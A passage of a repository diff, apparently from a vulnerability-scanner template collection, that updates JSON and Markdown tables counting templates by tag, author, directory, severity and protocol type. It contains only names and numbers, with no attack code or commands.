:"planon","count":1},{"name":"alquist","count":1},{"name":"processmaker","count":1},{"name":"mpsec","count":1},{"name":"finereport","count":1},{"name":"shortcode","count":1},{"name":"catfishcms","count":1},{"name":"fortilogger","count":1},{"name":"gemweb","count":1},{"name":"grails","count":1},{"name":"webmail","count":1},{"name":"axiom","count":1},{"name":"roads","count":1},{"name":"xmlchart","count":1},{"name":"sureline","count":1},{"name":"deviantart","count":1},{"name":"esmtp","count":1},{"name":"groupoffice","count":1},{"name":"ricoh","count":1},{"name":"redcap","count":1},{"name":"casemanager","count":1},{"name":"appweb","count":1},{"name":"wing-ftp","count":1},{"name":"lionwiki","count":1},{"name":"dvdFab","count":1},{"name":"cybrotech","count":1},{"name":"web-suite","count":1},{"name":"totolink","count":1},{"name":"moin","count":1},{"name":"oscommerce","count":1},{"name":"bullwark","count":1},{"name":"nomad","count":1},{"name":"fastapi","count":1},{"name":"taiga","count":1},{"name":"webmodule-ee","count":1},{"name":"buttercms","count":1},{"name":"fanwei","count":1},{"name":"natemail","count":1},{"name":"wiki","count":1},{"name":"smartsense","count":1},{"name":"identityguard","count":1},{"name":"fiori","count":1},{"name":"opencast","count":1},{"name":"microcomputers","count":1},{"name":"landray","count":1},{"name":"blue-ocean","count":1},{"name":"dbeaver","count":1},{"name":"lancom","count":1},{"name":"calendarific","count":1},{"name":"cryptocurrencies","count":1},{"name":"gpon","count":1},{"name":"crestron","count":1},{"name":"revslider","count":1},{"name":"ueditor","count":1},{"name":"bitrise","count":1},{"name":"prototype","count":1},{"name":"redwood","count":1},{"name":"oidc","count":1},{"name":"oki","count":1},{"name":"zuul","count":1},{"name":"scimono","count":1},{"name":"travis","count":1},{"name":"flowci","count":1},{"name":"beanshell","count":1},{"name":"commscope","count":1},{"name":"buildkite","count":1},{"name":"wdja","count":1},{"name":"clink-office","count":1},{"name":"chinaunicom","count":1},{"name":"phoronix","count":1},{"name":"optimizely","count":1},{"name":"h2","count":1},{"name":"oauth2","count":1},{"name":"tracer","count":1},{"name":"intelliflash","count":1},{"name":"xunchi","count":1},{"name":"alertmanager","count":1},{"name":"rijksmuseum","count":1},{"name":"dom","count":1},{"name":"polarisft","count":1},{"name":"ldap","count":1},{"name":"ucs","count":1},{"name":"dbt","count":1},{"name":"streetview","count":1},{"name":"billquick","count":1},{"name":"ilo4","count":1},{"name":"xml","count":1},{"name":"zoomsounds","count":1},{"name":"viaware","count":1},{"name":"admidio","count":1},{"name":"easyappointments","count":1},{"name":"landrayoa","count":1},{"name":"burp","count":1},{"name":"pinata","count":1},{"name":"rsyncd","count":1},{"name":"blackboard","count":1},{"name":"daybyday","count":1},{"name":"meshcentral","count":1},{"name":"netrc","count":1},{"name":"powercreator","count":1},{"name":"zms","count":1},{"name":"snipeit","count":1},{"name":"twig","count":1},{"name":"erp-nc","count":1},{"name":"gocron","count":1},{"name":"petfinder","count":1},{"name":"tika","count":1},{"name":"logontracer","count":1},{"name":"ecsimagingpacs","count":1},{"name":"eyou","count":1},{"name":"meraki","count":1},{"name":"purestorage","count":1},{"name":"opensso","count":1},{"name":"caseaware","count":1},{"name":"etherscan","count":1},{"name":"domino","count":1},{"name":"instagram","count":1},{"name":"smartblog","count":1},{"name":"mojoauth","count":1},{"name":"babel","count":1},{"name":"soar","count":1},{"name":"sco","count":1},{"name":"wondercms","count":1},{"name":"pihole","count":1},{"name":"holidayapi","count":1},{"name":"dropbox","count":1},{"name":"pippoint","count":1},{"name":"werkzeug","count":1},{"name":"eyoucms","count":1},{"name":"wavlink","count":1},{"name":"yachtcontrol","count":1},{"name":"osquery","count":1},{"name":"hortonworks","count":1},{"name":"keenetic","count":1},{"name":"lacie","count":1},{"name":"newsletter","count":1},{"name":"scanii","count":1},{"name":"delta","count":1},{"name":"spotify","count":1},{"name":"weglot","count":1},{"name":"aura","count":1},{"name":"saml","count":1},{"name":"tor","count":1},{"name":"securenvoy","count":1},{"name":"stridercd","count":1},{"name":"honeypot","count":1},{"name":"wazuh","count":1},{"name":"commvault","count":1},{"name":"sponip","count":1},{"name":"mara","count":1},{"name":"comfortel","count":1},{"name":"myucms","count":1},{"name":"buddy","count":1},{"name":"incapptic-connect","count":1},{"name":"ncbi","count":1},{"name":"faust","count":1},{"name":"netweaver","count":1},{"name":"spectracom","count":1},{"name":"codemeter","count":1},{"name":"hiawatha","count":1},{"name":"skywalking","count":1},{"name":"avalanche","count":1},{"name":"primefaces","count":1},{"name":"projector","count":1},{"name":"satellian","count":1},{"name":"pan","count":1},{"name":"vsftpd","count":1},{"name":"mkdocs","count":1},{"name":"tieline","count":1},{"name":"bonita","count":1},{"name":"springframework","count":1},{"name":"jnoj","count":1},{"name":"leanix","count":1},{"name":"ebird","count":1},{"name":"supervisor","count":1},{"name":"oam","count":1},{"name":"accent","count":1},{"name":"luftguitar","count":1},{"name":"zmanda","count":1},{"name":"vercel","count":1},{"name":"contactform","count":1},{"name":"sls","count":1},{"name":"eyelock","count":1},{"name":"emessage","count":1},{"name":"fcm","count":1},{"name":"netbeans","count":1},{"name":"qizhi","count":1},{"name":"plone","count":1},{"name":"routeros","count":1},{"name":"faraday","count":1},{"name":"szhe","count":1},{"name":"tplink","count":1},{"name":"chevereto","count":1},{"name":"cve2000","count":1},{"name":"alltube","count":1},{"name":"phpfastcache","count":1},{"name":"contentkeeper","count":1},{"name":"javafaces","count":1},{"name":"openweather","count":1},{"name":"place","count":1},{"name":"pendo","count":1},{"name":"xoops","count":1},{"name":"panasonic","count":1},{"name":"avada","count":1},{"name":"vanguard","count":1},{"name":"phalcon","count":1},{"name":"strider","count":1},{"name":"interactsh","count":1},{"name":"coinlayer","count":1},{"name":"weboftrust","count":1},{"name":"playable","count":1},{"name":"micro","count":1},{"name":"dotclear","count":1},{"name":"phpunit","count":1},{"name":"iframe","count":1},{"name":"jeecg-boot","count":1},{"name":"rsa","count":1},{"name":"openerp","count":1},{"name":"mongoshake","count":1},{"name":"trello","count":1},{"name":"kerbynet","count":1},{"name":"hanming","count":1},{"name":"remkon","count":1},{"name":"pastebin","count":1},{"name":"bitquery","count":1},{"name":"apcu","count":1},{"name":"edgeos","count":1},{"name":"gsm","count":1},{"name":"mtheme","count":1},{"name":"zentral","count":1},{"name":"matomo","count":1},{"name":"razor","count":1},{"name":"extractor","count":1},{"name":"coinapi","count":1},{"name":"gloo","count":1},{"name":"nweb2fax","count":1},{"name":"vms","count":1},{"name":"acsoft","count":1},{"name":"cors","count":1},{"name":"dwsync","count":1},{"name":"viewlinc","count":1},{"name":"webex","count":1},{"name":"aims","count":1},{"name":"malshare","count":1},{"name":"myvuehelp","count":1},{"name":"opensmtpd","count":1},{"name":"moonpay","count":1},{"name":"socomec","count":1},{"name":"sgp","count":1},{"name":"covalent","count":1}],"authors":[{"name":"daffainfo","count":560},{"name":"dhiyaneshdk","count":421},{"name":"pikpikcu","count":316},{"name":"pdteam","count":262},{"name":"geeknik","count":179},{"name":"dwisiswant0","count":168},{"name":"princechaddha","count":133},{"name":"0x_akoko","count":130},{"name":"gy741","count":118},{"name":"pussycat0x","count":116},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"idealphase","count":47},{"name":"gaurang","count":42},{"name":"ritikchaddha","count":42},{"name":"philippedelteil","count":36},{"name":"adam crosser","count":30},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"c-sh0","count":23},{"name":"ffffffff0x","count":22},{"name":"akincibor","count":20},{"name":"righettod","count":18},{"name":"cckuailong","count":17},{"name":"for3stco1d","count":16},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":15},{"name":"milo2012","count":14},{"name":"r3dg33k","count":14},{"name":"techbrunchfr","count":14},{"name":"sharath","count":13},{"name":"sullo","count":12},{"name":"suman_kar","count":12},{"name":"wdahlenb","count":11},{"name":"melbadry9","count":11},{"name":"cyllective","count":11},{"name":"johnk3r","count":10},{"name":"alph4byt3","count":10},{"name":"random_robbie","count":10},{"name":"nadino","count":10},{"name":"hackergautam","count":10},{"name":"meme-lord","count":10},{"name":"dogasantos","count":9},{"name":"emadshanab","count":9},{"name":"edoardottt","count":9},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"zh","count":8},{"name":"0x240x23elu","count":7},{"name":"divya_mudgal","count":7},{"name":"oppsec","count":7},{"name":"harshbothra_","count":7},{"name":"techryptic (@tech)","count":7},{"name":"logicalhunter","count":7},{"name":"randomstr1ng","count":7},{"name":"dr_set","count":7},{"name":"kophjager007","count":7},{"name":"random-robbie","count":7},{"name":"iamnoooob","count":6},{"name":"caspergn","count":6},{"name":"evan rubinstein","count":6},{"name":"rootxharsh","count":6},{"name":"__fazal","count":6},{"name":"forgedhallpass","count":6},{"name":"puzzlepeaches","count":6},{"name":"pentest_swissky","count":6},{"name":"pathtaga","count":6},{"name":"leovalcante","count":6},{"name":"ganofins","count":5},{"name":"elsfa7110","count":5},{"name":"yanyun","count":5},{"name":"xelkomy","count":5},{"name":"_0xf4n9x_","count":5},{"name":"praetorian-thendrickson","count":5},{"name":"lu4nx","count":5},{"name":"panch0r3d","count":5},{"name":"joanbono","count":5},{"name":"imnightmaree","count":5},{"name":"podalirius","count":5},{"name":"wisnupramoedya","count":4},{"name":"dadevel","count":4},{"name":"dolev farhi","count":4},{"name":"tanq16","count":4},{"name":"tess","count":4},{"name":"e_schultze_","count":4},{"name":"h1ei1","count":4},{"name":"incogbyte","count":4},{"name":"nodauf","count":4},{"name":"defr0ggy","count":4},{"name":"mr-xn","count":3},{"name":"skeltavik","count":3},{"name":"lark-lab","count":3},{"name":"dudez","count":3},{"name":"johnjhacking","count":3},{"name":"0w4ys","count":3},{"name":"shifacyclewala","count":3},{"name":"fyoorer","count":3},{"name":"me9187","count":3},{"name":"github.com/its0x08","count":3},{"name":"sushantkamble","count":3},{"name":"arcc","count":3},{"name":"shine","count":3},{"name":"davidmckennirey","count":3},{"name":"unstabl3","count":3},{"name":"mavericknerd","count":3},{"name":"binaryfigments","count":3},{"name":"gitlab red team","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"impramodsargar","count":3},{"name":"f1tz","count":3},{"name":"_generic_human_","count":3},{"name":"z3bd","count":3},{"name":"thomas_from_offensity","count":3},{"name":"r3naissance","count":3},{"name":"jarijaas","count":3},{"name":"whoever","count":3},{"name":"andydoering","count":3},{"name":"supras","count":3},{"name":"emenalf","count":3},{"name":"alifathi-h1","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"veshraj","count":3},{"name":"sbani","count":2},{"name":"nuk3s3c","count":2},{"name":"splint3r7","count":2},{"name":"hahwul","count":2},{"name":"martincodes-de","count":2},{"name":"zomsop82","count":2},{"name":"socketz","count":2},{"name":"g4l1t0","count":2},{"name":"hackerarpan","count":2},{"name":"z0ne","count":2},{"name":"cckuakilong","count":2},{"name":"0xcrypto","count":2},{"name":"ajaysenr","count":2},{"name":"raesene","count":2},{"name":"gevakun","count":2},{"name":"paperpen","count":2},{"name":"kre80r","count":2},{"name":"manas_harsh","count":2},{"name":"amsda","count":2},{"name":"hetroublemakr","count":2},{"name":"nvn1729","count":2},{"name":"sy3omda","count":2},{"name":"bernardofsr","count":2},{"name":"moritz nentwig","count":2},{"name":"vsh00t","count":2},{"name":"smaranchand","count":2},{"name":"ehsahil","count":2},{"name":"parth","count":2},{"name":"afaq","count":2},{"name":"redteambrasil","count":2},{"name":"kiblyn11","count":2},{"name":"geekby","count":2},{"name":"0xsmiley","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"danielmofer","count":2},{"name":"thardt-praetorian","count":2},{"name":"koti2","count":2},{"name":"y4er","count":2},{"name":"randomrobbie","count":2},{"name":"0xrudra","count":2},{"name":"rafaelwdornelas","count":2},{"name":"luci","count":2},{"name":"r12w4n","count":2},{"name":"dahse89","count":2},{"name":"its0x08","count":2},{"name":"huowuzhao","count":2},{"name":"convisoappsec","count":2},{"name":"k11h-de","count":2},{"name":"mohammedsaneem","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"bing0o","count":2},{"name":"hassan khan yusufzai - splint3r7","count":2},{"name":"cocxanh","count":2},{"name":"dheerajmadhukar","count":2},{"name":"ambassify","count":2},{"name":"fabaff","count":2},{"name":"joeldeleep","count":2},{"name":"bananabr","count":2},{"name":"pxmme1337","count":2},{"name":"ree4pwn","count":2},{"name":"taielab","count":2},{"name":"swissky","count":2},{"name":"0xprial","count":2},{"name":"x1m_martijn","count":2},{"name":"w4cky_","count":2},{"name":"lotusdll","count":2},{"name":"0xelkomy","count":2},{"name":"bsysop","count":2},{"name":"udit_thakkur","count":2},{"name":"bp0lr","count":2},{"name":"paradessia","count":2},{"name":"0xsapra","count":2},{"name":"foulenzer","count":2},{"name":"nkxxkn","count":2},{"name":"vavkamil","count":2},{"name":"gal nagli","count":2},{"name":"revblock","count":1},{"name":"mah3sec_","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"osamahamad","count":1},{"name":"schniggie","count":1},{"name":"deena","count":1},{"name":"pratik khalane","count":1},{"name":"ola456","count":1},{"name":"rodnt","count":1},{"name":"yashgoti","count":1},{"name":"sec_hawk","count":1},{"name":"alexrydzak","count":1},{"name":"soyelmago","count":1},{"name":"evan rubinstien","count":1},{"name":"juicypotato1","count":1},{"name":"thebinitghimire","count":1},{"name":"infosecsanyam","count":1},{"name":"xstp","count":1},{"name":"igibanez","count":1},{"name":"francescocarlucci","count":1},{"name":"exceed","count":1},{"name":"x6263","count":1},{"name":"0ut0fb4nd","count":1},{"name":"sshell","count":1},{"name":"shreyapohekar","count":1},{"name":"_darrenmartyn","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"hakluke","count":1},{"name":"patralos","count":1},{"name":"wabafet","count":1},{"name":"majidmc2","count":1},{"name":"0xd0ff9","count":1},{"name":"2rs3c","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"berkdusunur","count":1},{"name":"bad5ect0r","count":1},{"name":"harshinsecurity","count":1},{"name":"b0rn2r00t","count":1},{"name":"furkansenan","count":1},{"name":"p-l-","count":1},{"name":"absshax","count":1},{"name":"lethargynavigator","count":1},{"name":"breno_css","count":1},{"name":"fopina","count":1},{"name":"0xteles","count":1},{"name":"ohlinge","count":1},{"name":"cookiehanhoan","count":1},{"name":"rubina119","count":1},{"name":"ph33r","count":1},{"name":"phyr3wall","count":1},{"name":"zsusac","count":1},{"name":"prettyboyaaditya","count":1},{"name":"jeya seelan","count":1},{"name":"sherlocksecurity","count":1},{"name":"adrianmf","count":1},{"name":"retr0","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"0xtavian","count":1},{"name":"noobexploiter","count":1},{"name":"myztique","count":1},{"name":"ringo","count":1},{"name":"omarkurt","count":1},{"name":"charanrayudu","count":1},{"name":"zhenwarx","count":1},{"name":"th3.d1p4k","count":1},{"name":"xshuden","count":1},{"name":"oscarintherocks","count":1},{"name":"whynotke","count":1},{"name":"amnotacat","count":1},{"name":"opencirt","count":1},{"name":"dievus","count":1},{"name":"ofjaaah","count":1},{"name":"thezakman","count":1},{"name":"notsoevilweasel","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"brabbit10","count":1},{"name":"dawid-czarnecki","count":1},{"name":"udyz","count":1},{"name":"hanlaomo","count":1},{"name":"qlkwej","count":1},{"name":"jas37","count":1},{"name":"remonsec","count":1},{"name":"narluin","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"daffianfo","count":1},{"name":"act1on3","count":1},{"name":"akshansh","count":1},{"name":"thevillagehacker","count":1},{"name":"affix","count":1},{"name":"jeya.seelan","count":1},{"name":"push4d","count":1},{"name":"v0idc0de","count":1},{"name":"d0rkerdevil","count":1},{"name":"orpheus","count":1},{"name":"justmumu","count":1},{"name":"apt-mirror","count":1},{"name":"arr0way","count":1},{"name":"c3l3si4n","count":1},{"name":"prajiteshsingh","count":1},{"name":"pudsec","count":1},{"name":"luskabol","count":1},{"name":"petruknisme","count":1},{"name":"kaizensecurity","count":1},{"name":"makyotox","count":1},{"name":"mesaglio","count":1},{"name":"d4vy","count":1},{"name":"ooooooo_q","count":1},{"name":"toufik-airane","count":1},{"name":"exploitation","count":1},{"name":"_harleo","count":1},{"name":"clment cruchet","count":1},{"name":"kabirsuda","count":1},{"name":"intx0x80","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"0xrod","count":1},{"name":"xeldax","count":1},{"name":"3th1c_yuk1","count":1},{"name":"duty_1g","count":1},{"name":"shelld3v","count":1},{"name":"kurohost","count":1},{"name":"tirtha","count":1},{"name":"s1r1u5_","count":1},{"name":"luqmaan hadia","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"yashanand155","count":1},{"name":"rschio","count":1},{"name":"kailashbohara","count":1},{"name":"alevsk","count":1},{"name":"miroslavsotak","count":1},{"name":"tim_koopmans","count":1},{"name":"jrolf","count":1},{"name":"un-fmunozs","count":1},{"name":"daviey","count":1},{"name":"kiks7","count":1},{"name":"philippdelteil","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"tea","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"akash.c","count":1},{"name":"kareemse1im","count":1},{"name":"jteles","count":1},{"name":"compr00t","count":1},{"name":"0xceeb","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"luqman","count":1},{"name":"manuelbua","count":1},{"name":"0xh7ml","count":1},{"name":"noamrathaus","count":1},{"name":"andirrahmani1","count":1},{"name":"mrcl0wnlab","count":1},{"name":"nerrorsec","count":1},{"name":"f1she3","count":1},{"name":"b0yd","count":1},{"name":"yuansec","count":1},{"name":"jbaines-r7","count":1},{"name":"elmahdi","count":1},{"name":"mhdsamx","count":1},{"name":"aresx","count":1},{"name":"micha3lb3n","count":1},{"name":"_c0wb0y_","count":1},{"name":"aaronchen0","count":1},{"name":"bartu utku sarp","count":1},{"name":"florianmaak","count":1},{"name":"nytr0gen","count":1},{"name":"sickwell","count":1},{"name":"momen eldawakhly","count":1},{"name":"lark lab","count":1},{"name":"ilovebinbash","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"bjhulst","count":1},{"name":"ahmed sherif","count":1},{"name":"geraldino2","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"andysvints","count":1},{"name":"ldionmarcil","count":1},{"name":"j33n1k4","count":1},{"name":"shifacyclewla","count":1},{"name":"thesubtlety","count":1},{"name":"arall","count":1},{"name":"skylark-lab","count":1},{"name":"clarkvoss","count":1},{"name":"streetofhackerr007","count":1},{"name":"rojanrijal","count":1},{"name":"retr02332","count":1},{"name":"husain","count":1},{"name":"ok_bye_now","count":1},{"name":"exid","count":1},{"name":"elouhi","count":1},{"name":"official_blackhat13","count":1},{"name":"alex","count":1},{"name":"nielsing","count":1},{"name":"chron0x","count":1},{"name":"fmunozs","count":1},{"name":"ggranjus","count":1},{"name":"gboddin","count":1},{"name":"ipanda","count":1},{"name":"evolutionsec","count":1},{"name":"borna nematzadeh","count":1},{"name":"sicksec","count":1},{"name":"pdp","count":1},{"name":"dhiyaneshdki","count":1},{"name":"mass0ma","count":1},{"name":"furkansayim","count":1},{"name":"0xceba","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"izn0u","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"alperenkesk","count":1},{"name":"undefl0w","count":1},{"name":"becivells","count":1},{"name":"flag007","count":1},{"name":"fq_hsu","count":1},{"name":"ahmetpergamum","count":1},{"name":"coldfish","count":1},{"name":"zandros0","count":1},{"name":"willd96","count":1},{"name":"elder tao","count":1},{"name":"anon-artist","count":1},{"name":"knassar702","count":1},{"name":"0h1in9e","count":1},{"name":"blckraven","count":1},{"name":"hexcat","count":1},{"name":"rotemreiss","count":1},{"name":"tirtha_mandal","count":1},{"name":"ahmed abou-ela","count":1},{"name":"bughuntersurya","count":1},{"name":"jiheon-dev","count":1},{"name":"iampritam","count":1},{"name":"brenocss","count":1},{"name":"korteke","count":1},{"name":"co0nan","count":1},{"name":"regala_","count":1},{"name":"0ri2n","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"droberson","count":1},{"name":"b4uh0lz","count":1},{"name":"zinminphy0","count":1},{"name":"vzamanillo","count":1},{"name":"mubassirpatel","count":1},{"name":"manasmbellani","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"yavolo","count":1},{"name":"notnotnotveg","count":1},{"name":"wlayzz","count":1}],"directory":[{"name":"cves","count":1160},{"name":"exposed-panels","count":523},{"name":"vulnerabilities","count":452},{"name":"technologies","count":255},{"name":"exposures","count":204},{"name":"misconfiguration","count":197},{"name":"workflows","count":186},{"name":"token-spray","count":154},{"name":"default-logins","count":95},{"name":"file","count":68},{"name":"takeovers","count":67},{"name":"iot","count":38},{"name":"network","count":35},{"name":"miscellaneous","count":23},{"name":"cnvd","count":22},{"name":"dns","count":17},{"name":"fuzzing","count":12},{"name":"headless","count":6},{"name":"ssl","count":4}],"severity":[{"name":"info","count":1192},{"name":"high","count":874},{"name":"medium","count":662},{"name":"critical","count":414},{"name":"low","count":183},{"name":"unknown","count":6}],"types":[{"name":"http","count":3187},{"name":"file","count":68},{"name":"network","count":50},{"name":"dns","count":17}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index e6efa3ef83..202c85dca8 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,1546 +1,1555 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1150 | daffainfo | 560 | cves | 1154 | info | 1183 | http | 3164 | -| panel | 513 | dhiyaneshdk | 421 | exposed-panels | 519 | high | 870 | file | 68 | -| lfi | 460 | pikpikcu | 316 | vulnerabilities | 446 | medium | 658 | network | 50 | -| xss | 363 | pdteam | 262 | technologies | 251 | critical | 411 | dns | 17 | -| wordpress | 358 | geeknik | 178 | exposures | 203 | low | 180 | | | -| exposure | 292 | dwisiswant0 | 168 | misconfiguration | 196 | unknown | 6 | | | -| rce | 289 | princechaddha | 130 | workflows | 186 | | | | | -| cve2021 | 283 | 0x_akoko | 129 | token-spray | 153 | | | | | -| tech | 265 | gy741 | 117 | default-logins | 95 | | | | | -| wp-plugin | 259 | pussycat0x | 116 | file | 68 | | | | | -| cve2020 | 196 | madrobot | 65 | takeovers | 67 | | | | | +| cve | 1156 | daffainfo | 560 | cves | 1160 | info | 1192 | http | 3187 | +| panel | 515 | dhiyaneshdk | 421 | exposed-panels | 523 | high | 874 | file | 68 | +| lfi | 461 | pikpikcu | 316 | vulnerabilities | 452 | medium | 662 | network | 50 | +| xss | 367 | pdteam | 262 | technologies | 255 | critical | 414 | dns | 17 | +| wordpress | 364 | geeknik | 179 | exposures | 204 | low | 183 | | | +| exposure | 293 | dwisiswant0 | 168 | misconfiguration | 197 | unknown | 6 | | | +| rce | 291 | princechaddha | 133 | workflows | 186 | | | | | +| cve2021 | 283 | 0x_akoko | 130 | token-spray | 154 | | | | | +| tech | 271 | gy741 | 118 | default-logins | 95 | | | | | +| wp-plugin | 264 | pussycat0x | 116 | file | 68 | | | | | +| cve2020 | 197 | madrobot | 65 | takeovers | 67 | | | | | | | 188 | zzeitlin | 64 | iot | 38 | | | | | -| token-spray | 153 | idealphase | 46 | network | 35 | | | | | -| joomla | 131 | gaurang | 42 | miscellaneous | 23 | | | | | -| config | 126 | ritikchaddha | 37 | cnvd | 22 | | | | | -| cve2018 | 120 | philippedelteil | 36 | dns | 17 | | | | | +| token-spray | 154 | idealphase | 47 | network | 35 | | | | | +| joomla | 131 | ritikchaddha | 42 | miscellaneous | 23 | | | | | +| config | 126 | gaurang | 42 | cnvd | 22 | | | | | +| cve2018 | 121 | philippedelteil | 36 | dns | 17 | | | | | | apache | 120 | adam crosser | 30 | fuzzing | 12 | | | | | | cve2019 | 118 | ice3man | 26 | headless | 6 | | | | | | cve2010 | 111 | organiccrap | 24 | ssl | 4 | | | | | -| default-login | 109 | c-sh0 | 23 | | | | | | | -| unauth | 103 | ffffffff0x | 22 | | | | | | | -| iot | 102 | righettod | 18 | | | | | | | -| oast | 96 | cckuailong | 17 | | | | | | | -| login | 85 | akincibor | 16 | | | | | | | -| takeover | 73 | pr3r00t | 15 | | | | | | | -| token | 72 | sheikhrishad | 15 | | | | | | | -| redirect | 68 | for3stco1d | 15 | | | | | | | -| misconfig | 65 | r3dg33k | 14 | | | | | | | -| cve2017 | 64 | techbrunchfr | 14 | | | | | | | -| sqli | 62 | milo2012 | 14 | | | | | | | -| ssrf | 60 | sharath | 13 | | | | | | | +| default-login | 110 | c-sh0 | 23 | | | | | | | +| unauth | 108 | ffffffff0x | 22 | | | | | | | +| iot | 102 | akincibor | 20 | | | | | | | +| oast | 97 | righettod | 18 | | | | | | | +| login | 85 | cckuailong | 17 | | | | | | | +| takeover | 73 | for3stco1d | 16 | | | | | | | +| token | 72 | pr3r00t | 15 | | | | | | | +| redirect | 71 | sheikhrishad | 15 | | | | | | | +| misconfig | 65 | techbrunchfr | 14 | | | | | | | +| cve2017 | 64 | r3dg33k | 14 | | | | | | | +| cve2022 | 63 | milo2012 | 14 | | | | | | | +| sqli | 62 | sharath | 13 | | | | | | | +| ssrf | 61 | suman_kar | 12 | | | | | | | | file | 60 | sullo | 12 | | | | | | | -| cve2022 | 59 | suman_kar | 12 | | | | | | | +| wp | 55 | wdahlenb | 11 | | | | | | | | network | 53 | melbadry9 | 11 | | | | | | | -| oracle | 50 | cyllective | 11 | | | | | | | -| wp | 49 | wdahlenb | 11 | | | | | | | -| router | 49 | nadino | 10 | | | | | | | -| disclosure | 45 | meme-lord | 10 | | | | | | | -| cve2016 | 45 | hackergautam | 10 | | | | | | | +| router | 52 | cyllective | 11 | | | | | | | +| oracle | 50 | nadino | 10 | | | | | | | +| disclosure | 45 | alph4byt3 | 10 | | | | | | | +| cve2016 | 45 | meme-lord | 10 | | | | | | | | plugin | 40 | johnk3r | 10 | | | | | | | +| auth-bypass | 39 | hackergautam | 10 | | | | | | | | cve2014 | 37 | random_robbie | 10 | | | | | | | -| auth-bypass | 37 | alph4byt3 | 10 | | | | | | | -| google | 36 | emadshanab | 9 | | | | | | | -| cve2015 | 36 | dogasantos | 9 | | | | | | | -| cisco | 35 | aashiq | 8 | | | | | | | +| google | 36 | edoardottt | 9 | | | | | | | +| cve2015 | 36 | emadshanab | 9 | | | | | | | +| cisco | 35 | dogasantos | 9 | | | | | | | | authenticated | 35 | zh | 8 | | | | | | | -| logs | 33 | iamthefrogy | 8 | | | | | | | -| atlassian | 32 | edoardottt | 8 | | | | | | | -| injection | 30 | that_juan_ | 8 | | | | | | | -| listing | 30 | logicalhunter | 7 | | | | | | | +| logs | 33 | that_juan_ | 8 | | | | | | | +| atlassian | 32 | iamthefrogy | 8 | | | | | | | +| injection | 30 | aashiq | 8 | | | | | | | +| listing | 30 | harshbothra_ | 7 | | | | | | | | jira | 30 | techryptic (@tech) | 7 | | | | | | | -| traversal | 29 | kophjager007 | 7 | | | | | | | -| devops | 28 | oppsec | 7 | | | | | | | -| generic | 25 | random-robbie | 7 | | | | | | | -| kubernetes | 25 | randomstr1ng | 7 | | | | | | | -| adobe | 24 | harshbothra_ | 7 | | | | | | | -| cms | 24 | divya_mudgal | 7 | | | | | | | -| oss | 24 | 0x240x23elu | 7 | | | | | | | +| traversal | 29 | logicalhunter | 7 | | | | | | | +| devops | 28 | 0x240x23elu | 7 | | | | | | | +| generic | 26 | kophjager007 | 7 | | | | | | | +| kubernetes | 25 | divya_mudgal | 7 | | | | | | | +| adobe | 24 | randomstr1ng | 7 | | | | | | | | springboot | 24 | dr_set | 7 | | | | | | | -| proxy | 22 | iamnoooob | 6 | | | | | | | -| cnvd | 22 | caspergn | 6 | | | | | | | -| sap | 22 | puzzlepeaches | 6 | | | | | | | -| aem | 21 | rootxharsh | 6 | | | | | | | -| microsoft | 21 | evan rubinstein | 6 | | | | | | | -| misc | 21 | pathtaga | 6 | | | | | | | +| cms | 24 | random-robbie | 7 | | | | | | | +| oss | 24 | oppsec | 7 | | | | | | | +| proxy | 22 | pathtaga | 6 | | | | | | | +| cnvd | 22 | leovalcante | 6 | | | | | | | +| sap | 22 | iamnoooob | 6 | | | | | | | +| microsoft | 21 | rootxharsh | 6 | | | | | | | +| vmware | 21 | caspergn | 6 | | | | | | | | intrusive | 21 | __fazal | 6 | | | | | | | -| vmware | 21 | leovalcante | 6 | | | | | | | -| debug | 21 | forgedhallpass | 6 | | | | | | | -| service | 20 | pentest_swissky | 6 | | | | | | | +| debug | 21 | pentest_swissky | 6 | | | | | | | +| aem | 21 | forgedhallpass | 6 | | | | | | | +| misc | 21 | puzzlepeaches | 6 | | | | | | | +| wp-theme | 20 | evan rubinstein | 6 | | | | | | | +| service | 20 | ganofins | 5 | | | | | | | | fuzz | 20 | _0xf4n9x_ | 5 | | | | | | | -| cve2012 | 19 | elsfa7110 | 5 | | | | | | | -| wp-theme | 19 | xelkomy | 5 | | | | | | | -| manageengine | 19 | joanbono | 5 | | | | | | | -| php | 18 | panch0r3d | 5 | | | | | | | -| dns | 18 | ganofins | 5 | | | | | | | -| zoho | 18 | lu4nx | 5 | | | | | | | -| deserialization | 17 | yanyun | 5 | | | | | | | -| tomcat | 17 | podalirius | 5 | | | | | | | -| weblogic | 17 | praetorian-thendrickson | 5 | | | | | | | -| aws | 17 | imnightmaree | 5 | | | | | | | -| k8s | 16 | tanq16 | 4 | | | | | | | -| ibm | 16 | incogbyte | 4 | | | | | | | -| cve2011 | 15 | tess | 4 | | | | | | | -| 